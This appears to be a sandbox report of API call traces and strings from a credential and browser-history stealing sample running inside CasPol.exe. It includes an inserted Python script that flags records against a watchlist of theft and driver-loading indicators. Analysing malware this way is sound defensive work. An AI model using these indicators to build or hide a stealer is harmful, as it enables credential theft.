                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: memcpy$_wcsicmpmemset$freewcschrwcslen
                                                                                                                  • String ID: $AccessCount$AccessedTime$CreationTime$EntryID$ExpiryTime$ModifiedTime$Url
                                                                                                                  • API String ID: 3849927982-2252543386
                                                                                                                  • Opcode ID: c30480054a5ca474dc40abe6212bc187cfeb1b733cbf080f7a891c76daa1d321
                                                                                                                  • Instruction ID: 3bb3cf654da2d90f893253d259683e8481abe175d229eeda5eb464894a91a1db
                                                                                                                  • Opcode Fuzzy Hash: c30480054a5ca474dc40abe6212bc187cfeb1b733cbf080f7a891c76daa1d321
                                                                                                                  • Instruction Fuzzy Hash: DA512071E00309ABDF10EFA6DC45B9EB7B8AF54305F15443BA904F7291E678AA14CB58
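Two of the function records above carry the indicators an analyst would actually pivot on: the one that resolves NtLoadDriver, NtUnloadDriver, NtSuspendProcess and NtResumeProcess from ntdll.dll through GetProcAddress (so none of them show up in the import table), and the one whose string table holds browser-history field names (AccessCount, AccessedTime, EntryID, ExpiryTime, Url). The following is an added example, not Joe Sandbox code and not part of the sample: it parses IDA-plugin function records in the exact line shape printed in this report ("func.MODULE(args), ref: addr", "Part of subcall function X: ...", "String ID: a$b$c", "Opcode ID: ...") and flags records whose dynamically resolved imports or embedded strings hit a watchlist. The watchlist categories and the sample text are constructed for the example; the sample lines are copied in shape from the two records named above.

```python
"""Triage Joe Sandbox IDA-plugin function records (added example, not Joe Sandbox code).

Groups the report's 'APIs' listings into per-function records, extracts the names
passed to GetProcAddress and the '$'-separated String ID list, and matches both
against a watchlist so suspicious records can be pulled out of a multi-thousand
line report without reading every block.
"""
import re
from typing import NamedTuple


class ApiCall(NamedTuple):
    func: str
    module: str
    args: tuple
    ref: str
    parent: str  # caller address when the line is "Part of subcall function X: ..."


class FunctionRecord:
    def __init__(self):
        self.calls: list[ApiCall] = []
        self.strings: list[str] = []
        self.opcode_id = ""

    def resolved_imports(self) -> set[str]:
        """Symbol names handed to GetProcAddress; hex constants and '?' are skipped."""
        return {a for c in self.calls if c.func == "GetProcAddress"
                for a in c.args if a != "?" and not HEX_RE.match(a)}


# "GetProcAddress.KERNEL32(00000000,NtLoadDriver), ref: 0041356B" or "memset.MSVCRT ref: 0041087D"
CALL_RE = re.compile(
    r"^(?:Part of subcall function (?P<parent>[0-9A-F]+): )?"
    r"(?P<func>[^\s.(]+)\.(?P<module>[A-Z0-9]+)"
    r"(?:\((?P<args>.*)\))?,?\s+ref:\s+(?P<ref>[0-9A-F]+)$")
HEX_RE = re.compile(r"^-?[0-9A-F]{8}$")

# Assumption: watchlist chosen for this example, not a Joe Sandbox or vendor rule set.
WATCHLIST = {
    "native_driver_process_control": {"NtLoadDriver", "NtUnloadDriver",
                                      "NtSuspendProcess", "NtResumeProcess"},
    "browser_history_fields": {"AccessCount", "AccessedTime", "EntryID",
                               "ExpiryTime", "ModifiedTime", "Url"},
}


def parse_records(text: str) -> list[FunctionRecord]:
    records: list[FunctionRecord] = []
    for raw in text.splitlines():
        line = raw.strip().lstrip("•").strip()
        if line == "APIs":                      # every function listing starts here
            records.append(FunctionRecord())
            continue
        if not records:
            continue
        rec = records[-1]
        if line.startswith("String ID:"):
            rec.strings = [s for s in line[len("String ID:"):].strip().split("$") if s]
        elif line.startswith("Opcode ID:"):
            rec.opcode_id = line[len("Opcode ID:"):].strip()
        else:
            m = CALL_RE.match(line)
            if m:
                args = tuple(m["args"].split(",")) if m["args"] is not None else ()
                rec.calls.append(ApiCall(m["func"], m["module"], args, m["ref"], m["parent"] or ""))
    return records


def triage(text: str) -> list[dict]:
    """One dict per record: opcode id, sorted resolved imports, watchlist hits."""
    out = []
    for rec in parse_records(text):
        indicators = rec.resolved_imports() | set(rec.strings)
        hits = {tag: sorted(indicators & names) for tag, names in WATCHLIST.items()
                if indicators & names}
        out.append({"opcode_id": rec.opcode_id,
                    "resolved": sorted(rec.resolved_imports()),
                    "hits": hits})
    return out


# Constructed sample: two records in the report's own line format.
SAMPLE = """\
APIs
• GetModuleHandleW.KERNEL32(ntdll.dll,-00000108,0040DE02,?,000000FF,00000000,00000104), ref: 00413542
• GetProcAddress.KERNEL32(00000000,NtQuerySystemInformation), ref: 00413559
• GetProcAddress.KERNEL32(NtLoadDriver), ref: 0041356B
• GetProcAddress.KERNEL32(NtSuspendProcess), ref: 004135C5
Strings
Memory Dump Source
• String ID: NtLoadDriver$NtQuerySystemInformation$NtSuspendProcess$ntdll.dll
• Opcode ID: 57b3ef5f97466978e1990f74adf29af07ff290b7ce4571feabf87054e0031f76
APIs
  • Part of subcall function 0040AA29: wcslen.MSVCRT ref: 0040AA3C
• memcpy.MSVCRT(?,-00000121,00000008,0044E518,00000000,00000000,74DF2EE0), ref: 0040E3EC
• String ID: $AccessCount$AccessedTime$CreationTime$EntryID$ExpiryTime$ModifiedTime$Url
• Opcode ID: c30480054a5ca474dc40abe6212bc187cfeb1b733cbf080f7a891c76daa1d321
"""

if __name__ == "__main__":
    for r in triage(SAMPLE):
        print(r["opcode_id"][:16], r["resolved"], r["hits"])
```

Run it against the whole report text instead of SAMPLE to get the records worth reading first; a hit on the native-API category is the one to chase, since a user-mode payload that reaches for NtLoadDriver and NtSuspendProcess by name is hiding those calls from static import analysis, and the browser-history field names corroborate the credential/history theft signatures listed in the summary.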
                                                                                                                  APIs
                                                                                                                  • ??2@YAPAXI@Z.MSVCRT(?,?,0040DC1B,?,00000000), ref: 0044480A
                                                                                                                  • _snwprintf.MSVCRT ref: 0044488A
                                                                                                                  • wcscpy.MSVCRT ref: 004448B4
                                                                                                                  • ??3@YAXPAX@Z.MSVCRT(00000000,00000000,?,OriginalFileName,00000000,?,LegalCopyright,00000000,?,InternalName,00000000,?,CompanyName,00000000,?,ProductVersion), ref: 00444964
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000D.00000002.2087264896.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ??2@??3@_snwprintfwcscpy
                                                                                                                  • String ID: %4.4X%4.4X$040904E4$CompanyName$FileDescription$FileVersion$InternalName$LegalCopyright$OriginalFileName$ProductName$ProductVersion$\VarFileInfo\Translation
                                                                                                                  • API String ID: 2899246560-1542517562
                                                                                                                  • Opcode ID: e17f1f04e88a4cb48931d1772d94f5796c3f29ffdcb1b521dadae3bcfb684220
                                                                                                                  • Instruction ID: ddb1140ba30d93f946c39142265044aeba6ebe712c4753dd77c76fa61262b17a
                                                                                                                  • Opcode Fuzzy Hash: e17f1f04e88a4cb48931d1772d94f5796c3f29ffdcb1b521dadae3bcfb684220
                                                                                                                  • Instruction Fuzzy Hash: 434127B2900218BAD704EFA1DC82DDEB7BCBF49305B110167BD05B3152DB78A655CBE8
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                                                  • GetFileSize.KERNEL32(00000000,00000000,?,00000001,00000000,?,004089ED,?,?,?,0000001E,?,?,00000104), ref: 00408589
                                                                                                                  • ??2@YAPAXI@Z.MSVCRT(00000001,?,004089ED,?,?,?,0000001E,?,?,00000104,?,?,00000104,?,?,00000104), ref: 0040859D
                                                                                                                    • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                                                                  • memset.MSVCRT ref: 004085CF
                                                                                                                  • memset.MSVCRT ref: 004085F1
                                                                                                                  • memset.MSVCRT ref: 00408606
                                                                                                                  • strcmp.MSVCRT ref: 00408645
                                                                                                                  • _mbscpy.MSVCRT(?,?,?,?,?,?), ref: 004086DB
                                                                                                                  • _mbscpy.MSVCRT(?,?,?,?,?,?), ref: 004086FA
                                                                                                                  • memset.MSVCRT ref: 0040870E
                                                                                                                  • strcmp.MSVCRT ref: 0040876B
                                                                                                                  • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000001E), ref: 0040879D
                                                                                                                  • CloseHandle.KERNEL32(?,?,004089ED,?,?,?,0000001E,?,?,00000104,?,?,00000104,?,?,00000104), ref: 004087A6
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000D.00000002.2087264896.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: memset$File$_mbscpystrcmp$??2@??3@CloseCreateHandleReadSize
                                                                                                                  • String ID: ---
                                                                                                                  • API String ID: 3437578500-2854292027
                                                                                                                  • Opcode ID: c5c02c04611bcd29229c4833ebed6afde2d02892c84083fd30bc2caee93791c4
                                                                                                                  • Instruction ID: 4c5fbc017ddd4a43d5b0f69e9578b2b0908928dff5e121bfcb53d45818d158f6
                                                                                                                  • Opcode Fuzzy Hash: c5c02c04611bcd29229c4833ebed6afde2d02892c84083fd30bc2caee93791c4
                                                                                                                  • Instruction Fuzzy Hash: 256191B2C0421DAADF20DB948D819DEBBBCAB15314F1140FFE558B3141DA399BC4CBA9
                                                                                                                  APIs
                                                                                                                  • memset.MSVCRT ref: 0041087D
                                                                                                                  • memset.MSVCRT ref: 00410892
                                                                                                                  • GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 004108A4
                                                                                                                  • SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00004001), ref: 004108C2
                                                                                                                  • SendMessageW.USER32(?,00001003,00000001,?), ref: 004108FF
                                                                                                                  • SendMessageW.USER32(?,00001003,00000000,?), ref: 00410936
                                                                                                                  • GetModuleHandleW.KERNEL32(00000000), ref: 00410951
                                                                                                                  • LoadImageW.USER32(00000000,00000085,00000000,00000010,00000010,00001000), ref: 00410963
                                                                                                                  • GetModuleHandleW.KERNEL32(00000000), ref: 0041096E
                                                                                                                  • LoadImageW.USER32(00000000,00000086,00000000,00000010,00000010,00001000), ref: 00410980
                                                                                                                  • GetSysColor.USER32(0000000F), ref: 00410999
                                                                                                                  • DeleteObject.GDI32(?), ref: 004109D0
                                                                                                                  • DeleteObject.GDI32(?), ref: 004109D6
                                                                                                                  • SendMessageW.USER32(00000000,00001208,00000000,?), ref: 004109F3
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000D.00000002.2087264896.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: MessageSend$DeleteHandleImageLoadModuleObjectmemset$ColorDirectoryFileInfoWindows
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1010922700-0
APIs
  • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
• GetFullPathNameW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186AC
• malloc.MSVCRT ref: 004186B7
• free.MSVCRT ref: 004186C7
• GetFullPathNameW.KERNEL32(00000000,-00000003,00000000,00000000), ref: 004186DB
• free.MSVCRT ref: 004186E0
• GetFullPathNameA.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186F6
• malloc.MSVCRT ref: 004186FE
• GetFullPathNameA.KERNEL32(00000000,-00000003,00000000,00000000), ref: 00418711
• free.MSVCRT ref: 00418716
• free.MSVCRT ref: 0041872A
• free.MSVCRT ref: 00418749
Strings
Memory Dump Source
• Source File: 0000000D.00000002.2087264896.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
Similarity
• API ID: free$FullNamePath$malloc$Version
• String ID: |A
• API String ID: 3356672799-1717621600
APIs
Strings
Memory Dump Source
• Source File: 0000000D.00000002.2087264896.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
Similarity
• API ID: _wcsicmp
• String ID: /scomma$/shtml$/skeepass$/stab$/stabular$/sverhtml$/sxml
• API String ID: 2081463915-1959339147
APIs
  • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
  • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
  • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
  • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
  • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
  • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
• GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 004138ED
• GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 004138FE
• GetProcAddress.KERNEL32(00000000,GetModuleFileNameExW), ref: 0041390F
• GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 00413920
• GetProcAddress.KERNEL32(00000000,GetModuleInformation), ref: 00413931
• FreeLibrary.KERNEL32(00000000), ref: 00413951
Strings
Memory Dump Source
• Source File: 0000000D.00000002.2087264896.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
Similarity
• API ID: AddressProc$Library$Load$DirectoryFreeSystemmemsetwcscatwcscpy
• String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$GetModuleFileNameExW$GetModuleInformation$psapi.dll
• API String ID: 2012295524-70141382
APIs
• GetModuleHandleW.KERNEL32(kernel32.dll,?,0041339D), ref: 0041384C
• GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 00413865
• GetProcAddress.KERNEL32(00000000,Module32First), ref: 00413876
• GetProcAddress.KERNEL32(00000000,Module32Next), ref: 00413887
• GetProcAddress.KERNEL32(00000000,Process32First), ref: 00413898
• GetProcAddress.KERNEL32(00000000,Process32Next), ref: 004138A9
Strings
Memory Dump Source
• Source File: 0000000D.00000002.2087264896.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
Similarity
• API ID: AddressProc$HandleModule
• String ID: CreateToolhelp32Snapshot$Module32First$Module32Next$Process32First$Process32Next$kernel32.dll
• API String ID: 667068680-3953557276
APIs
• GetDC.USER32(00000000), ref: 004121FF
• GetDeviceCaps.GDI32(00000000,0000005A), ref: 0041220A
• ReleaseDC.USER32(00000000,00000000), ref: 0041221F
• SetBkMode.GDI32(?,00000001), ref: 00412232
• SetTextColor.GDI32(?,00FF0000), ref: 00412240
• SelectObject.GDI32(?,?), ref: 00412251
• DrawTextExW.USER32(?,?,000000FF,?,00000024,?), ref: 00412285
• SelectObject.GDI32(00000014,00000005), ref: 00412291
  • Part of subcall function 00411FC6: GetCursorPos.USER32(?), ref: 00411FD0
  • Part of subcall function 00411FC6: GetSubMenu.USER32(?,00000000), ref: 00411FDE
  • Part of subcall function 00411FC6: TrackPopupMenu.USER32(00000000,00000002,?,?,00000000,?,00000000), ref: 0041200F
• GetModuleHandleW.KERNEL32(00000000), ref: 004122AC
• LoadCursorW.USER32(00000000,00000067), ref: 004122B5
• SetCursor.USER32(00000000), ref: 004122BC
• PostMessageW.USER32(?,00000428,00000000,00000000), ref: 00412304
• memcpy.MSVCRT(?,?,00002008), ref: 0041234D
Memory Dump Source
• Source File: 0000000D.00000002.2087264896.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
Similarity
• API ID: Cursor$MenuObjectSelectText$CapsColorDeviceDrawHandleLoadMessageModeModulePopupPostReleaseTrackmemcpy
• String ID:
• API String ID: 1700100422-0
APIs
• GetClientRect.USER32(?,?), ref: 004111E0
• GetWindowRect.USER32(?,?), ref: 004111F6
• GetWindowRect.USER32(?,?), ref: 0041120C
• GetDlgItem.USER32(00000000,0000040D), ref: 00411246
• GetWindowRect.USER32(00000000), ref: 0041124D
• MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 0041125D
• BeginDeferWindowPos.USER32(00000004), ref: 00411281
• DeferWindowPos.USER32(?,?,00000000,00000000,00000000,?,?,00000004), ref: 004112A4
• DeferWindowPos.USER32(?,?,00000000,00000000,?,?,?,00000006), ref: 004112C3
• DeferWindowPos.USER32(?,?,00000000,00000000,000000DC,?,?,00000004), ref: 004112EE
• DeferWindowPos.USER32(?,00000000,00000000,00000000,?,?,000000DC,00000004), ref: 00411306
• EndDeferWindowPos.USER32(?), ref: 0041130B
Memory Dump Source
• Source File: 0000000D.00000002.2087264896.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
Similarity
• API ID: Window$Defer$Rect$BeginClientItemPoints
• String ID:
• API String ID: 552707033-0
APIs
• CreateFileW.KERNEL32(?,80000000,00000003,00000000,00000003,00000000,00000000,?,?,?,0040C255,?,?,*.*,0040C2BF,00000000), ref: 0040C0A4
  • Part of subcall function 0040A32D: SetFilePointer.KERNEL32(0040C2BF,?,00000000,00000000,?,0040C0C5,00000000,00000000,?,00000020,?,0040C255,?,?,*.*,0040C2BF), ref: 0040A33A
• GetFileSize.KERNEL32(00000000,00000000), ref: 0040C0D4
  • Part of subcall function 0040BFF3: _memicmp.MSVCRT ref: 0040C00D
  • Part of subcall function 0040BFF3: memcpy.MSVCRT(?,?,00000004,00000000,?,?,?,?,?,?,?,?,*.*,0040C2BF,00000000), ref: 0040C024
• memcpy.MSVCRT(00000000,?,00000004,00000000,?,?,?,?), ref: 0040C11B
• strchr.MSVCRT ref: 0040C140
• strchr.MSVCRT ref: 0040C151
• _strlwr.MSVCRT ref: 0040C15F
• memset.MSVCRT ref: 0040C17A
• CloseHandle.KERNEL32(00000000), ref: 0040C1C7
Strings
Memory Dump Source
• Source File: 0000000D.00000002.2087264896.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
Similarity
• API ID: File$memcpystrchr$CloseCreateHandlePointerSize_memicmp_strlwrmemset
• String ID: 4$h
• API String ID: 4066021378-1856150674
APIs
Strings
Memory Dump Source
• Source File: 0000000D.00000002.2087264896.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
Similarity
• API ID: memset$_snwprintf
• String ID: %%0.%df
• API String ID: 3473751417-763548558
APIs
• SetTimer.USER32(?,00000041,00000064,00000000), ref: 004060C7
• KillTimer.USER32(?,00000041), ref: 004060D7
• KillTimer.USER32(?,00000041), ref: 004060E8
• GetTickCount.KERNEL32 ref: 0040610B
• GetParent.USER32(?), ref: 00406136
• SendMessageW.USER32(00000000), ref: 0040613D
• BeginDeferWindowPos.USER32(00000004), ref: 0040614B
• EndDeferWindowPos.USER32(00000000), ref: 0040619B
• InvalidateRect.USER32(?,?,00000001), ref: 004061A7
Strings
Memory Dump Source
• Source File: 0000000D.00000002.2087264896.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
Similarity
• API ID: Timer$DeferKillWindow$BeginCountInvalidateMessageParentRectSendTick
• String ID: A
                                                                                                                  • API String ID: 2892645895-3554254475
                                                                                                                  • Opcode ID: 9ab18b63844edbdd48863c33bac36f0a113902732bc81a80893c7cf372b99e85
                                                                                                                  • Instruction ID: 3d646c34c65c30a23a549f03b0efc12359fcfb722ff8df3f2fd47db5f06942f8
                                                                                                                  • Opcode Fuzzy Hash: 9ab18b63844edbdd48863c33bac36f0a113902732bc81a80893c7cf372b99e85
                                                                                                                  • Instruction Fuzzy Hash: 67318F75240304BBEB205F62DC85F6A7B6ABB44742F018539F3067A5E1C7F998A18B58
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000D.00000002.2087264896.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Menu$Itemmemset$CountInfoModifywcscatwcschr
                                                                                                                  • String ID: 0$6
                                                                                                                  • API String ID: 4066108131-3849865405
                                                                                                                  • Opcode ID: 0289309123c9ab86839131df51d1afc7e9f627d47cda6d3754f054bafba8353e
                                                                                                                  • Instruction ID: 23fd2219eb4cf2a86962fa47610fb6a66e7712bfbd77636794901fa2ff6d3352
                                                                                                                  • Opcode Fuzzy Hash: 0289309123c9ab86839131df51d1afc7e9f627d47cda6d3754f054bafba8353e
                                                                                                                  • Instruction Fuzzy Hash: 1C317C72808344AFDB209F95D84499FB7E8FF84314F00493EFA48A2291D775D949CB5B
                                                                                                                  APIs
                                                                                                                  • memset.MSVCRT ref: 004082EF
                                                                                                                    • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
                                                                                                                  • memset.MSVCRT ref: 00408362
                                                                                                                  • memset.MSVCRT ref: 00408377
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000D.00000002.2087264896.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: memset$ByteCharMultiWide
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 290601579-0
                                                                                                                  • Opcode ID: 0f4830a1bd5c139c57c95e775b3a7e0dd93a0ba2de61a1ec6096e44496360a03
                                                                                                                  • Instruction ID: eff1c4cb9ad8ed09cf65616da307521f953f8cb6273bc8e87bbfe44e88666a06
                                                                                                                  • Opcode Fuzzy Hash: 0f4830a1bd5c139c57c95e775b3a7e0dd93a0ba2de61a1ec6096e44496360a03
                                                                                                                  • Instruction Fuzzy Hash: E1716C72E0421DAFEF10EFA1EC82AEDB7B9EF04314F14406FE104B6191EB795A458B59
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000D.00000002.2087264896.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: free$wcslen
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3592753638-3916222277
                                                                                                                  • Opcode ID: c7ce2940fe04b4405a0b219ffbd3b3dbc0b14a035c74dd75871d5eb09ab59b8c
                                                                                                                  • Instruction ID: 6c84a66137f0c35b9d0eb965e4703c645d554f15bb1c6f80accdbf0b715e4580
                                                                                                                  • Opcode Fuzzy Hash: c7ce2940fe04b4405a0b219ffbd3b3dbc0b14a035c74dd75871d5eb09ab59b8c
                                                                                                                  • Instruction Fuzzy Hash: 78614A70E0421ADADF28AF95E6485EEB771FF04315F60807BE411B62D1EBB84981CB5D
                                                                                                                  APIs
                                                                                                                  • memset.MSVCRT ref: 0040A47B
                                                                                                                  • _snwprintf.MSVCRT ref: 0040A4AE
                                                                                                                  • wcslen.MSVCRT ref: 0040A4BA
                                                                                                                  • memcpy.MSVCRT(?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4D2
                                                                                                                  • wcslen.MSVCRT ref: 0040A4E0
                                                                                                                  • memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4F3
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000D.00000002.2087264896.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: memcpywcslen$_snwprintfmemset
                                                                                                                  • String ID: %s (%s)$YV@
                                                                                                                  • API String ID: 3979103747-598926743
                                                                                                                  • Opcode ID: 2040f1418fb7f55927111411806f4302e3b16a8f1d7874ce907b9bb2b5999412
                                                                                                                  • Instruction ID: 06bfc13611ed198a4270a5cd43788582667178ba612a9453d6f3368808cd6753
                                                                                                                  • Opcode Fuzzy Hash: 2040f1418fb7f55927111411806f4302e3b16a8f1d7874ce907b9bb2b5999412
                                                                                                                  • Instruction Fuzzy Hash: 31216F72900219BBDF21DF55CC45D8BB7B8BF04318F018466E948AB106DB74EA188BD9
                                                                                                                  APIs
                                                                                                                  • LoadLibraryW.KERNEL32(comctl32.dll), ref: 004044C3
                                                                                                                  • GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 004044D5
                                                                                                                  • FreeLibrary.KERNEL32(00000000), ref: 004044E9
                                                                                                                  • MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404514
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000D.00000002.2087264896.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Library$AddressFreeLoadMessageProc
                                                                                                                  • String ID: Error$Error: Cannot load the common control classes.$InitCommonControlsEx$comctl32.dll
                                                                                                                  • API String ID: 2780580303-317687271
                                                                                                                  • Opcode ID: 4451af1fa5a3c13e403cd0bd9a94ec580510088b32cd85f0031bb893d40152de
                                                                                                                  • Instruction ID: 703d86131c3dcb59aab6256491fb2853d543806c906e0642a055f98632e98cc8
                                                                                                                  • Opcode Fuzzy Hash: 4451af1fa5a3c13e403cd0bd9a94ec580510088b32cd85f0031bb893d40152de
                                                                                                                  • Instruction Fuzzy Hash: B201D6757502217BE7112FB69C49F7B7A9CFF82749B000035E601E2180EAB8D901926D
                                                                                                                  APIs
                                                                                                                  • LoadLibraryExW.KERNEL32(netmsg.dll,00000000,00000002,?,?,?,?,00409764,?), ref: 0040A686
                                                                                                                  • FormatMessageW.KERNEL32(00001100,00000000,?,00000400,?,00000000,00000000,?,?,?,?,00409764,?), ref: 0040A6A4
                                                                                                                  • wcslen.MSVCRT ref: 0040A6B1
                                                                                                                  • wcscpy.MSVCRT ref: 0040A6C1
                                                                                                                  • LocalFree.KERNEL32(?,?,00000400,?,00000000,00000000,?,?,?,?,00409764,?), ref: 0040A6CB
                                                                                                                  • wcscpy.MSVCRT ref: 0040A6DB
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000D.00000002.2087264896.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: wcscpy$FormatFreeLibraryLoadLocalMessagewcslen
                                                                                                                  • String ID: Unknown Error$netmsg.dll
                                                                                                                  • API String ID: 2767993716-572158859
                                                                                                                  • Opcode ID: 6af7a682c2b6d94d5c313714e0e524a7557e97864fcb7fd89b068039d1905f7d
                                                                                                                  • Instruction ID: f30f617898fcbe25dfcd40b25f3134c3ee1324ef56ff669fd92f7ad18b117fee
                                                                                                                  • Opcode Fuzzy Hash: 6af7a682c2b6d94d5c313714e0e524a7557e97864fcb7fd89b068039d1905f7d
                                                                                                                  • Instruction Fuzzy Hash: 77014772104214BFE7151B61EC46E9F7B3DEF06795F24043AF902B10D0DA7A5E10D69D
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  • out of memory, xrefs: 0042F865
                                                                                                                  • database is already attached, xrefs: 0042F721
                                                                                                                  • too many attached databases - max %d, xrefs: 0042F64D
                                                                                                                  • attached databases must use the same text encoding as main database, xrefs: 0042F76F
                                                                                                                  • unable to open database: %s, xrefs: 0042F84E
                                                                                                                  • database %s is already in use, xrefs: 0042F6C5
                                                                                                                  • cannot ATTACH database within transaction, xrefs: 0042F663
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000D.00000002.2087264896.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                  Similarity
